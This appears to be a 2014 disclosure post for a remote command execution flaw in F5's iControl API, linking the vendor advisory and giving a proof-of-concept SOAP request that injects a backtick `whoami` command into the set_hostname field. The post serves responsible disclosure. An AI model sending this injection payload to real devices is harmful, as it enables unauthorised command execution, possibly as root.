F5 iControl Remote Command Execution

Posted on 08 May 2014

Hi,

Linked below is an advisory regarding remote command execution (as root,
possibly) vulnerabilities within the iControl API:

http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html

An example request that will set the hostname to 'root.example.com':

<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
 <SOAP-ENV:Body>
 <n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
 <hostname>`whoami`.example.com</hostname>
 </n1:set_hostname>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

This was responsibly disclosed to F5 on the 7th of February. If you
would like the full communication timeline, feel free to ask.

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20